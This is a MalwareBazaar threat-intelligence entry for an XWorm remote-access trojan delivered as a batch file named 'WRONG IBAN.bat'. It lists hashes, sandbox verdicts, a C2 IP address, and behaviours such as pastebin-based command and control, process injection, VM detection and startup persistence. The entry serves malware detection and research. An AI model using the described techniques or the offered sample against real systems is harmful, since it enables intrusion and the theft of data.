MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


XWorm


Vendor detections: 11


Intelligence 11 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444
SHA3-384 hash: 8455af02f9148c200cd2f0a660917fd873f38192c9da46ab7f349aca141f68207e2e3e8cf610ca78128804954681986f
SHA1 hash: 1c1d9191fa40f956e55ff706e41b09e5d28f8697
MD5 hash: 7426f8af3d4ff5cd700ce26af4c497e3
humanhash: september-fanta-winter-cola
File name:WRONG IBAN.bat
Download: download sample
Signature XWorm
Create hunting rule
File size:204'284 bytes
First seen:2025-08-13 11:54:55 UTC
Last seen:2025-08-13 12:54:42 UTC
File type:Batch (bat) bat
MIME type:text/plain
ssdeep 3072:GegBI0HWavWj3Q3IxFS1BqpWhOo9qUef2A4jvYVz8NF2pUNyvdbbS:G9I0HWuWj3Q31Bqp1op421UVz9pUaBu
TLSH T1771418BECAB9EDC007AF78D8954E3B4A108D4B83FA750B2DF8E124B21A145459F7A54C
Magika vba
Reporter smica83
Tags:193-187-91-114--60875 bat xworm

Intelligence

File Origin
# of uploads :
2
# of downloads :
56
Origin country :
HU HU
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
WRONG IBAN.bat
Verdict:
No threats detected
Analysis date:
2025-08-13 05:08:03 UTC
Tags:
n/a
Link:
https://app.any.run/tasks/6ebcd6e3-bbff-4a0c-b692-d7467b3735ea

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
XWorm
Create hunting rule
Link:
https://www.capesandbox.com/analysis/21134/
Detection(s):
SecuriteInfo.com.BAT.Obfus-5.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
90.2%
Link:
https://cyber-fortress.com/docs/result/index.php?id=689c7d3031e468d937246871
Tags:
autorun shell spawn sage
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
base64 evasive obfuscated powershell
Link:
https://www.filescan.io/uploads/689c7d41397fd3ce6fa780aa/reports/1fa4bf76-a435-408a-b566-669b2cf92f6b/overview
Verdict:
Suspicious
Labled as:
BAT/Agent5.AUH
Link:
https://www.hybrid-analysis.com/sample/50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444
Result
Threat name:
n/a
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1755986
Signature
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Creates a thread in another existing process (thread injection)
Drops script or batch files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Drops script at startup location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1755986 Sample: WRONG IBAN.bat Startdate: 13/08/2025 Architecture: WINDOWS Score: 100 121 pastebin.com 2->121 123 gce-beacons.gcp.gvt2.com 2->123 125 4 other IPs or domains 2->125 149 Suricata IDS alerts for network traffic 2->149 151 Malicious sample detected (through community Yara rule) 2->151 153 Multi AV Scanner detection for dropped file 2->153 157 12 other signatures 2->157 11 cmd.exe 1 2->11         started        14 cmd.exe 1 2->14         started        16 cmd.exe 1 2->16         started        18 15 other processes 2->18 signatures3 155 Connects to a pastebin service (likely for C&C) 121->155 process4 signatures5 161 Suspicious powershell command line found 11->161 20 cmd.exe 1 11->20         started        22 conhost.exe 11->22         started        24 cmd.exe 1 14->24         started        26 conhost.exe 14->26         started        28 cmd.exe 1 16->28         started        30 conhost.exe 16->30         started        32 cmd.exe 1 18->32         started        34 cmd.exe 18->34         started        36 26 other processes 18->36 process6 process7 38 cmd.exe 3 20->38         started        41 cmd.exe 2 24->41         started        43 cmd.exe 2 28->43         started        45 cmd.exe 2 32->45         started        47 cmd.exe 34->47         started        49 cmd.exe 36->49         started        51 cmd.exe 36->51         started        53 cmd.exe 36->53         started        55 8 other processes 36->55 signatures8 159 Suspicious powershell command line found 38->159 57 2 other processes 38->57 62 2 other processes 41->62 64 2 other processes 43->64 66 2 other processes 45->66 68 2 other processes 47->68 70 2 other processes 49->70 72 2 other processes 51->72 74 2 other processes 53->74 76 16 other processes 55->76 process9 dnsIp10 141 193.187.91.114, 49718, 60875 OBE-EUROPEObenetworkEuropeSE Sweden 57->141 143 pastebin.com 104.20.29.150, 443, 49717 CLOUDFLARENETUS United States 57->143 117 4 other malicious files 57->117 dropped 163 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 57->163 165 Drops script or batch files to the startup folder 57->165 167 Writes to foreign memory regions 57->167 169 3 other signatures 57->169 78 chrome.exe 13 57->78         started        82 msedge.exe 57->82         started        84 msedge.exe 15 57->84         started        103 C:\Users\user\AppData\Roaming\...\2520.bat, ASCII 62->103 dropped 105 C:\Users\user\AppData\Roaming\...\81f0.bat, ASCII 64->105 dropped 107 C:\Users\user\AppData\Roaming\...\8a8a.bat, ASCII 66->107 dropped 109 C:\Users\user\AppData\Roaming\...\afab.bat, ASCII 68->109 dropped 111 C:\Users\user\AppData\Roaming\...\156b.bat, ASCII 70->111 dropped 113 C:\Users\user\AppData\Roaming\...\5fad.bat, ASCII 72->113 dropped 115 C:\Users\user\AppData\Roaming\...\99dc.bat, ASCII 74->115 dropped 119 8 other malicious files 76->119 dropped file11 signatures12 process13 dnsIp14 145 192.168.2.4, 443, 49710, 49717 unknown unknown 78->145 171 Suspicious powershell command line found 78->171 173 Suspicious execution chain found 78->173 86 chrome.exe 78->86         started        89 chrome.exe 78->89         started        91 chrome.exe 78->91         started        147 239.255.255.250 unknown Reserved 82->147 175 Maps a DLL or memory area into another process 82->175 93 msedge.exe 82->93         started        95 msedge.exe 82->95         started        97 msedge.exe 82->97         started        101 5 other processes 82->101 99 msedge.exe 84->99         started        signatures15 process16 dnsIp17 133 2 other IPs or domains 86->133 135 5 other IPs or domains 89->135 127 s-part-0012.t-0009.t-msedge.net 13.107.246.40, 443, 49747, 49772 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 93->127 129 ax-0001.ax-msedge.net 150.171.27.10, 443, 49746 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 93->129 137 34 other IPs or domains 93->137 131 13.107.253.40 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 95->131 139 2 other IPs or domains 95->139
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444/
Verdict:
Malicious
Threat:
Backdoor.MSIL.XWorm
Link:
https://tip.neiki.dev/file/50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=kcvxnxsy4ycsts4jyjt5hpany7fjz56zfe4vrr5jiplmnm2bmrca._file
Result
Malware family:
xworm
Create hunting rule
Score:
  10/10
Tags:
family:xworm execution rat trojan
Link:
https://tria.ge/reports/250813-n3n6sswr12/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Drops startup file
Blocklisted process makes network request
Detect Xworm Payload
Xworm
Xworm family
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/50ab76de58e6/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/50ab76de58e60529cb89c267d3bc0dc7ca9cf7d9293958c7a943d6c6b3416444

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Sus_CMD_Powershell_Usage
Create hunting rule
Author:XiAnzheng
Description:May Contain(Obfuscated or no) Powershell or CMD Command that can be abused by threat actor(can create FP)

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/21134/

Comments